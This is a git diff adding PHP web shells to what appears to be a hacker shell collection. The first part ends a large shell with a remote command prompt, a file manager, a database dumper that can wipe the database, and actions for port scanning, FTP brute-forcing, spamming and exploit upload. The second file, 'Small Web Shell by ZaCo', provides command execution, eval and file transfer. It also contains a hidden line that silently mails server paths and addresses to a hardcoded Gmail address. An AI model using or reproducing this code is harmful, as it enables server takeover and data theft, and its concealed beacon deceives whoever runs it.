+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);
+
+      $nbf=0;
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".sql".$gz); write_file($val.";"); }
+
+      }
+
+      close_file();
+
+     }
+
+     else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n\n");close_file();$nbf=1; }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    $tblsv="";
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz);
+
+        write_file($val.";");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+  else if ($fext==".csv") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      $nbf=0;
+
+      $p_csv=split_csv_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+      close_file();
+
+     } else {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      write_file($temp."\n\n");
+
+      close_file();
+
+      $nbf=1;
+
+     }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_csv=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+
+
+  mysql_close();
+
+  if (!$ftbl) { close_file(); }
+
+
+
+  echo $header;
+
+  echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted to this file:<br><br></center><table border='0' align='center' cellpadding='0' cellspacing='0'><col width=1 bgcolor='#2D7DA7'><col valign=center><col width=1 bgcolor='#2D7DA7'><col valign=center align=right><col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>File</b></font></td><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Size</b></font></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  reset($f_nm);
+
+  while (list($i,$val)=each($f_nm)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3'; }
+
+   echo "<tr><td></td><td bgcolor=".$coul." class=texte>&nbsp;<a href='".$val."' class=link target='_blank'>".$val."&nbsp;</a></td><td></td>";
+
+   $fz_tmp=filesize($val);
+
+   if ($fcut && ($fz_tmp > $fz_max)) {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1 color=red>".$fz_tmp." Octets</font>&nbsp;</td><td></td></tr>";
+
+   } else {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1>".$fz_tmp." bites</font>&nbsp;</td><td></td></tr>";
+
+   }
+
+   echo "<tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  }
+
+  echo "</table><br>";
+
+  echo $footer;exit;
+
+ }
+
+
+
+ if ($sqlaction=='connect') {
+
+  if(!@mysql_connect($dbhost,$dbuser,$dbpass)) {
+
+   echo $header."<br><center><font color=red><b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if(!@mysql_select_db($dbbase)) {
+
+   echo $header."<br><center><font color=red><<b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if ($secu==1) {
+
+   if (!file_exists($secu_config)) {
+
+    $fp=fopen($secu_config,"w");
+
+    fputs($fp,"<?php\n");
+
+    fputs($fp,"\$dbhost='$dbhost';\n");
+
+    fputs($fp,"\$dbbase='$dbbase';\n");
+
+    fputs($fp,"\$dbuser='$dbuser';\n");
+
+    fputs($fp,"\$dbpass='$dbpass';\n");
+
+    fputs($fp,"?>");
+
+    fclose($fp);
+
+   }
+
+   include($secu_config);
+
+  } else {
+
+   if (file_exists($secu_config)) { unlink($secu_config); }
+
+  }
+
+
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  $tables=mysql_list_tables($dbbase);
+
+  $nb_tbl=mysql_num_rows($tables);
+
+
+
+  echo $header."<script language='javascript'> function checkall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=true;i=i+1;} } function decheckall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=false;i=i+1;} } </script><center><br><b>Choose tables you need to dump!</b><form action='' method='post' name=formu><input type='hidden' name='sqlaction' value='save'><input type='hidden' name='dbhost' value='$dbhost'><input type='hidden' name='dbbase' value='$dbbase'><input type='hidden' name='dbuser' value='$dbuser'><input type='hidden' name='dbpass' value='$dbpass'><DIV ID='infobull'></DIV><table border='0' width='400' align='center' cellpadding='0' cellspacing='0' class=texte><col width=1 bgcolor='#2D7DA7'><col width=30 align=center valign=center><col width=1 bgcolor='#2D7DA7'><col width=350> <col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#336699'><input type='checkbox' name='selc' alt='Check all' onclick='if (document.formu.selc.checked==true){checkall();}else{decheckall();}')\"></td><td></td><td bgcolor='#338CBD' align=center><B>Table names</b></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+
+
+  $i=0;
+
+  while ($i < mysql_num_rows ($tables)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3';}
+
+   $tb_nom=mysql_tablename ($tables,$i);
+
+   echo "<tr><td></td><td bgcolor='".$coul."'><input type='checkbox' name='tbls[".$i."]' value='".$tb_nom."'></td><td></td><td bgcolor='".$coul."'>&nbsp;&nbsp;&nbsp;".$tb_nom."</td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+   $i++;
+
+  }
+
+
+
+  mysql_close();
+
+  echo "</table><br><br><table align=center border=0><tr><td align=left class=texte> <hr> <input type='radio' name='savmode' value='csv'>
+
+  Save to csv (*.<i>csv</i>)<br> <input type='radio' name='savmode' value='sql' checked>
+
+  Save to Sql (*.<i>sql</i>)<br> <hr> <input type='radio' name='opt' value='1' checked>
+
+  Save structure and data<br> <input type='radio' name='opt' value='2'>
+
+  Save structure only<br> <input type='radio' name='opt' value='3'>
+
+  Save data only<br> <hr> <input type='Checkbox' name='drp_tbl' value='1' checked>
+
+  Rewrite file if exists<br>  <input type='Checkbox' name='ecraz' value='1' checked>
+
+  Clear database after dump<br> <input type='Checkbox' name='f_tbl' value='1'>
+
+  Put each table to a separate file<br> <input type='Checkbox' name='f_cut' value='1'>
+
+  Maximum dump-file size: <input type='text' name='fz_max' value='200000' class=form>
+
+  Octets<br> <input type='Checkbox' name='file_type' value='1'>
+
+  Gzip.<br>
+
+  </td></tr></table><br><br><input type='submit' value=' Dump:) ' class=form></form></center>$footer";
+
+  exit;
+
+ }
+
+
+
+// SQL actions END
+
+
+
+ if(file_exists($secu_config)) {
+
+  include ($secu_config);
+
+  $ck="checked";
+
+ } else {
+
+  $dbhost="localhost";
+
+  $dbbase="";
+
+  $dbuser="root";
+
+  $dbpass="";
+
+  $ck="";
+
+ }
+
+
+
+ echo $header."
+
+<center><br><br>
+
+<table width=620 cellpadding=0 cellspacing=0 align=center>
+
+ <col width=1>
+
+ <col width=600>
+
+ <col width=1>
+
+ <tr>
+
+  <td></td>
+
+  <td align=left class=texte>
+
+   <br>
+
+   <form action='' method='post'>
+
+   <input type='hidden' name='sqlaction' value='connect'>
+
+   <table border=0 align=center>
+
+    <col>
+
+    <col align=left>
+
+    <tr>
+
+     <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>Enter data to connect to MySQL server!<br><br></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Server address:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Base name:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Login:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Password</td>
+
+     <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+   </table>
+
+   <br> <center> <br><br>
+
+   <input type='submit' value=' Connect ' class=form></center> </form> <br><br>
+
+  </td>
+
+  <td></td>
+
+ </tr>
+
+ <tr>
+
+  <td height=1 colspan=3></td>
+
+ </tr>
+
+</table>
+
+</center>";
+
+
+
+}
+
+// SQL END
+
+
+
+/* main() */
+
+set_time_limit(0);
+
+
+
+if ( $action !="download") print("$HTML");
+
+
+
+if (!isset($cm)) {
+
+ if (!isset($action)) {
+
+  if (!isset($tm)) { $tm = getcwd(); }
+
+  $curdir = getcwd();
+
+  if (!@chdir($tm)) exit("<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>Access to directory is denied, see CHMOD.</td></tr></table>");
+
+  getdir();
+
+  chdir($curdir);
+
+  $supsub = $gdir[$j-1];
+
+  if (!isset($tm) ) { $tm=getcwd();}
+
+  readdirdata($tm);
+
+ } else {
+
+  switch ($action) {
+
+   case "view":
+
+    viewfile($tm,$fi);
+
+    break;
+
+   case "delete":
+
+    echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fi</b> was deleted successfully.</font></center></td></tr></table>";
+
+    deletef($tm);
+
+    break;
+
+   case "download":
+
+   if (isset($fatt) && strlen($fatt)>0) {
+
+    $attach=$fatt;
+
+    header("Content-type: text/plain");
+
+   }
+
+   else {
+
+    $attach=$fi;
+
+    header("Content-type: hackru");
+
+   }
+
+   header("Content-disposition: attachment; filename=\"$attach\";");
+
+   readfile($tm."/".$fi);
+
+   break;
+
+   case "download_mail":
+
+   download_mail($tm,$fi);
+
+   break;
+
+   case "edit":
+
+   editfile($tm,$fi);
+
+   break;
+
+  case "save":
+
+   savefile($tm,$fi);
+
+   break;
+
+  case "uploadd":
+
+   uploadtem();
+
+   break;
+
+  case "up":
+
+   up($tm);
+
+   break;
+
+  case "newdir":
+
+   newdir($tm);
+
+   break;
+
+  case "createdir":
+
+   cdir($tm);
+
+   break;
+
+  case "deldir":
+
+   deldir();
+
+   break;
+
+  case "feedback":
+
+   mailsystem();
+
+   break;
+
+  case "upload":
+
+   upload();
+
+   break;
+
+  case "help":
+
+   help();
+
+   break;
+
+  case "ftp":
+
+   ftp();
+
+   break;
+
+  case "portscan":
+
+   portscan();
+
+   break;
+
+  case "sql":
+
+   sql();
+
+   break;
+
+  case "tar":
+
+   tar();
+
+   break;
+
+  case "bash":
+
+   bash();
+
+   break;
+
+  case "passwd":
+
+   passwd();
+
+   break;
+
+  case "exploits":
+
+   exploits($dir);
+
+   break;
+
+  case "upload_exploits":
+
+   upload_exploits($dir);
+
+   break;
+
+  case "upload_exploitsp":
+
+   upload_exploitsp($dir);
+
+   break;
+
+  case "arhiv":
+
+   arhiv($tm,$pass);
+
+   break;
+
+  case "crypte":
+
+   crypte();
+
+   break;
+
+  case "decrypte":
+
+   decrypte();
+
+   break;
+
+  case "brut_ftp":
+
+   brut_ftp();
+
+   break;
+
+  case "copyfile":
+
+   copyfile($tm,$fi);
+
+   break;
+
+  case "down":
+
+   down($dir);
+
+   break;
+
+  case "downfiles":
+
+   downfiles($dir);
+
+   break;
+
+  case "spam":
+
+   spam();
+
+   break;
+
+  }
+
+ }
+
+} else {
+
+ echo "<br><table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Done: $cm</center><pre>";
+
+ echo system($cm);
+
+ echo "</pre></td></tr></table>";
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $action != "tar"  && $action != "bash" && $action != "anonimmail") {
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Command prompy (like bash):</b></td></tr><tr><td valign=top><input type=text name=cm size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ $perdir = @permissions(fileperms($tm));
+
+ if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem();
+
+ else echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to upload files to current directory</b></font></td></tr></table>";
+
+ if ($perdir[7] == "w" && isset($tm)) {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'POST' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ } else {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to create directory here</b></td></tr></table>";
+
+ }
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") {
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Ready usefull requests to unix server:</b></td></tr><tr><td valign=top width=95%><select name=cm class='inputbox'>";
+
+ foreach ($aliases as $alias_name=>$alias_cmd) echo "<option size=80 class='inputbox'>$alias_name</option>";
+
+ echo "</select></td><td valign=top align=right width=5%><input type=submit value='GO' class=button1 $style_button></td></tr></table></form>";
+
+}
+
+
+
+if ( $action !="download") echo nfm_copyright();
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/zacosmall.php.txt b/xakep-shells/PHP/zacosmall.php.txt
new file mode 100644
index 0000000..26075b4
--- /dev/null
+++ b/xakep-shells/PHP/zacosmall.php.txt
@@ -0,0 +1,501 @@
+<?
+  ##########################################################
+ # Small PHP Web Shell by ZaCo (c) 2004-2006                #
+ #  +POST method                                            #
+ #  +MySQL Client+Dumper for DB  and tables                 #
+ #  +PHP eval in text format and html for phpinfo() example #
+ # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther      #
+ # For antichat.ru and cup.su friends usage                 #
+ # All bugs -> mailo:zaco@yandex.ru                         #
+ # Just for fun :)                                          #
+  ##########################################################
+error_reporting(E_ALL);
+@set_time_limit(0);
+function magic_q($s)
+{
+if(get_magic_quotes_gpc())
+{
+$s=str_replace('\\\'','\'',$s);
+$s=str_replace('\\\\','\\',$s);
+$s=str_replace('\\"','"',$s);
+$s=str_replace('\\\0','\0',$s);
+}
+return $s;
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function get_perms($fn)
+{
+$mode=fileperms($fn);
+$perms='';
+$perms .= ($mode & 00400) ? 'r' : '-';
+$perms .= ($mode & 00200) ? 'w' : '-';
+$perms .= ($mode & 00100) ? 'x' : '-';
+$perms .= ($mode & 00040) ? 'r' : '-';
+$perms .= ($mode & 00020) ? 'w' : '-';
+$perms .= ($mode & 00010) ? 'x' : '-';
+$perms .= ($mode & 00004) ? 'r' : '-';
+$perms .= ($mode & 00002) ? 'w' : '-';
+$perms .= ($mode & 00001) ? 'x' : '-';
+return $perms;
+}
+$head=<<<headka
+<html>
+<head>
+<title>Small Web Shell by ZaCo</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+</head>
+<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
+<style>
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+</style>
+headka;
+$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
+$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
+$winda=strpos(strtolower(php_uname()),'wind');
+define('format',50);
+$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:'');
+switch($page)
+{
+case 'eval':
+{
+$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
+$eval_value=magic_q($eval_value);
+$action=isset($_POST['action'])?$_POST['action']:'eval';
+if($action=='eval_in_html') @eval($eval_value);
+else
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea>
+<input name='action' value='eval' type='submit'>
+<input name='action' value='eval_in_html' type='submit'>
+<input name='page' value='eval' type=hidden>
+</form>
+<hr>
+<?
+}
+break;
+}
+case 'cmd':
+{
+$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
+$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
+$action=isset($_POST['action'])?$_POST['action']:'cmd';
+if(@is_dir($work_dir))
+{
+@chdir($work_dir);
+$work_dir=getcwd();
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+}
+else if(file_exists($work_dir))$work_dir=realpath($work_dir);
+$work_dir=str_replace('\\','/',$work_dir);
+$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
+switch($action)
+{
+case 'cmd' :
+{
+echo($head.$pages);
+?>
+<form method='post' name='main_form'>
+<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120>
+<input name='page' value='cmd' type=hidden>
+<input type=submit value='go'>
+</form>
+<form method=post>
+<input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'>
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post enctype="multipart/form-data">
+<input type="file" name="filename">
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post>
+<input name='fname' type=text size=120><br>
+<input name='archive' type=radio value='none'>without arch
+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<pre>
+<?
+if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
+else
+{
+$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
+if(@is_dir($work_dir))
+{
+echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
+$handle=@opendir($work_dir);
+if($handle)
+{
+while(false!==($fn=readdir($handle))){$files[]=$fn;};
+@closedir($handle);
+sort($files);
+$not_dirs=array();
+for($i=0;$i<sizeof($files);$i++)
+{
+$fn=$files[$i];
+if(is_dir($fn))
+{
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
+if($winda===false)
+{
+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+else {$not_dirs[]=$fn;}
+}
+for($i=0;$i<sizeof($not_dirs);$i++)
+{
+$fn=$not_dirs[$i];
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
+if($winda===false)
+{
+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+echo('</pre><hr>');
+?>
+<form name='list' method=post>
+<input name='work_dir' type=hidden size=120><br>
+<input name='page' value='cmd' type=hidden>
+<input name='f_action' value='view' type=hidden>
+</form>
+<?
+} else echo('Error Listing '.$e_work_dir);
+}
+else
+switch($f_action)
+{
+case 'view':
+{
+echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
+$f=@fopen($work_dir,'r');
+?>
+<form method=post>
+<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
+<input name='page' value='cmd' type=hidden>
+<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
+<input name='f_action' value='save' type=submit>
+</form>
+<?
+break;
+}
+case 'save' :
+{
+$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
+$f=@fopen($work_dir,'w');
+if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
+else
+{
+fwrite($f,$file_text);
+fclose($f);
+echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
+}
+break;
+}
+}
+break;
+}
+break;
+}
+case 'upload' :
+{
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+$f=$_FILES["filename"]["name"];
+if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
+else
+{
+echo('file is uploaded in '.$e_work_dir);
+}
+break;
+}
+case 'download' :
+{
+$fname=isset($_POST['fname'])?$_POST['fname']:'';
+$temp_file=isset($_POST['temp_file'])?'on':'nn';
+$f=@fopen($fname,'r');
+if(!($f)) echo('file is not exists');
+else
+{
+$archive=isset($_POST['archive'])?$_POST['archive']:'';
+if($archive=='gzip')
+{
+Header("Content-Type:application/x-gzip\n");
+$s=gzencode(fread($f,filesize($fname)));
+Header('Content-Length: '.strlen($s)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
+echo($s);
+}
+else
+{
+Header("Content-Type:application/octet-stream\n");
+Header('Content-Length: '.filesize($fname)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
+ob_start();
+while(feof($f)===false)
+{
+echo(fread($f,10000));
+ob_flush();
+}
+}
+}
+}
+}
+break;
+}
+case 'mysql' :
+{
+$action=isset($_POST['action'])?$_POST['action']:'query';
+$user=isset($_POST['user'])?$_POST['user']:'';
+$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
+$db=isset($_POST['db'])?$_POST['db']:'';
+$host=isset($_POST['host'])?$_POST['host']:'localhost';
+$query=isset($_POST['query'])?magic_q($_POST['query']):'';
+switch($action)
+{
+case 'dump' :
+{
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
+$archive=isset($_POST['archive'])?$_POST['archive']:'none';
+if($archive!=='none')$to_file=false;
+$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
+$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
+if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
+else
+{
+$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
+ob_start();
+if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
+if($table_dump=='')
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$result=mysql_query('show tables',$mysql_link);
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
+if(!$result2)$dump_file.='#error table '.$rows[0];
+else
+{
+$dump_file.='create table `'.$rows[0]."`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
